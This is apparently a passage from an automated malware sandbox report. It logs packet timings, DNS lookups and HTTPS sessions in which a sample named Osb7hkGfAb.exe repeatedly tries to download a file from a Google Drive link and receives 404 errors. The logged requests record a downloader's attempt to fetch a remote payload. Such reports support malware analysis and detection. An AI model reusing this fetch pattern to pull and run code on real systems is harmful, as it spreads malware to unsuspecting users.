                                                                Jan 10, 2025 15:55:29.147032976 CET44349737142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:29.556267977 CET44349737142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:29.556433916 CET49737443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:29.556446075 CET44349737142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:29.556494951 CET49737443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:29.556703091 CET49737443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:29.556786060 CET44349737142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:29.556842089 CET49737443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:29.581336975 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:29.581396103 CET44349738216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:29.581485987 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:29.586793900 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:29.586811066 CET44349738216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:30.234601021 CET44349738216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:30.234771967 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:30.235613108 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:30.235625982 CET44349738216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:30.235888958 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:30.235894918 CET44349738216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:30.668560982 CET44349738216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:30.668607950 CET44349738216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:30.668670893 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:30.668670893 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:30.668749094 CET44349738216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:30.668809891 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:30.669610977 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:30.669653893 CET44349738216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:30.669713974 CET49738443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:30.794739962 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:30.794775963 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:30.794847965 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:30.795224905 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:30.795232058 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:31.432531118 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:31.432652950 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:31.433320999 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:31.433427095 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:31.435425997 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:31.435435057 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:31.435739994 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:31.435798883 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:31.436106920 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:31.479334116 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:31.859198093 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:31.859303951 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:31.859323025 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:31.859410048 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:31.859599113 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:31.859689951 CET44349739142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:31.859745979 CET49739443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:31.872991085 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:31.873034000 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:31.873104095 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:31.873411894 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:31.873425007 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.521338940 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.521428108 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.523464918 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.523473024 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.524503946 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.524640083 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.525140047 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.567326069 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.930397987 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.930573940 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.930587053 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.930623055 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.930643082 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.930685997 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.930699110 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.930751085 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.930820942 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:32.930874109 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.931344986 CET49740443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:32.931369066 CET44349740216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:33.044997931 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:33.045018911 CET44349741142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:33.045147896 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:33.045732021 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:33.045742035 CET44349741142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:33.681572914 CET44349741142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:33.681721926 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:33.684319019 CET44349741142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:33.684386969 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:33.691258907 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:33.691266060 CET44349741142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:33.691757917 CET44349741142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:33.691808939 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:33.692203045 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:33.735323906 CET44349741142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:34.071408987 CET44349741142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:34.071567059 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:34.071806908 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:34.071907043 CET44349741142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:34.071963072 CET49741443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:34.084032059 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:34.084072113 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:34.084147930 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:34.084419012 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:34.084433079 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:34.725081921 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:34.725188971 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:34.725737095 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:34.725747108 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:34.725939035 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:34.725944996 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:35.155922890 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:35.156002998 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:35.156014919 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:35.156042099 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:35.156068087 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:35.156112909 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:35.156124115 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:35.156138897 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:35.156162024 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:35.156186104 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:35.156796932 CET49742443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:35.156810999 CET44349742216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:35.279450893 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:35.279484034 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:35.279572010 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:35.279923916 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:35.279934883 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:35.934519053 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:35.934776068 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:35.935897112 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:35.935987949 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:35.938446045 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:35.938457012 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:35.939166069 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:35.939235926 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:35.939730883 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:35.987330914 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:36.422434092 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:36.422638893 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:36.422657013 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:36.422770023 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:36.422770977 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:36.422853947 CET44349743142.250.184.206192.168.2.9
                                                                Jan 10, 2025 15:55:36.422920942 CET49743443192.168.2.9142.250.184.206
                                                                Jan 10, 2025 15:55:36.437745094 CET49744443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:36.437844038 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:36.437944889 CET49744443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:36.438570023 CET49744443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:36.438608885 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:37.113560915 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:37.113632917 CET49744443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:37.114304066 CET49744443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:37.114317894 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:37.114607096 CET49744443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:37.114612103 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:37.534070015 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:37.534317017 CET49744443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:37.534328938 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:37.534424067 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:37.534476042 CET49744443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:37.534476042 CET49744443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:37.534507990 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:37.534552097 CET44349744216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:52.893815041 CET49758443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:52.893822908 CET44349758216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:52.894232035 CET49758443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:52.894237041 CET44349758216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:53.311546087 CET44349758216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:53.311611891 CET44349758216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:53.311623096 CET49758443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:53.311638117 CET44349758216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:53.311651945 CET49758443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:53.311685085 CET44349758216.58.206.33192.168.2.9
                                                                Jan 10, 2025 15:55:53.311705112 CET49758443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:53.311960936 CET49758443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:53.318814993 CET49758443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:53.318840027 CET44349758216.58.206.33192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 15:54:57.900892019 CET | 53935 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 15:54:57.907571077 CET | 53 | 53935 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 15:54:59.042856932 CET | 60498 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 15:54:59.049588919 CET | 53 | 60498 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 15:54:57.900892019 CET | 192.168.2.9 | 1.1.1.1 | 0xa900 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:54:59.042856932 CET | 192.168.2.9 | 1.1.1.1 | 0x84d3 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 15:54:57.907571077 CET | 1.1.1.1 | 192.168.2.9 | 0xa900 | No error (0) | drive.google.com | | 142.250.184.206 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:54:59.049588919 CET | 1.1.1.1 | 192.168.2.9 | 0x84d3 | No error (0) | drive.usercontent.google.com | | 216.58.206.33 | A (IP address) | IN (0x0001) | false
                                                                • drive.google.com
                                                                • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49711 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:54:58 UTC | 216 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
2025-01-10 14:54:59 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:54:58 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-ur8X_0iu3fj_81hcLBqz4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49712 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:54:59 UTC | 258 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
2025-01-10 14:55:00 UTC | 2222 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTOxKKgv0yqzSLoegjtDuFz8wG_4tUO9ZVxnyZ1AfQolu7Ta0Y7LzJkmzzFWj-wtHB6
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:54:59 GMT
                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-t114D-0_h5tx6l17ENxXPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Set-Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI; expires=Sat, 12-Jul-2025 14:54:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
2025-01-10 14:55:00 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VTB6Ma-FLlKDuRsgcAo2kw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49713 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:55:00 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
2025-01-10 14:55:01 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:01 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-cGI-74GnbVSJ_nmY_gYAlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49714 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:55:01 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
2025-01-10 14:55:02 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQq3kgsiWJfFbHzE-ofbyjbul2Dr1f4-OgcB0uXXSlFyMkApjy5nVwj0PFeW0imsTKDtL6_GG8
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:02 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce--fKHTpzmTtkfK_LMx4XT6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
2025-01-10 14:55:02 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sIrwoU3L6veQL1sLJ08XWQ">*{margin:0;padding:0}html,code{font:15px/22px arial


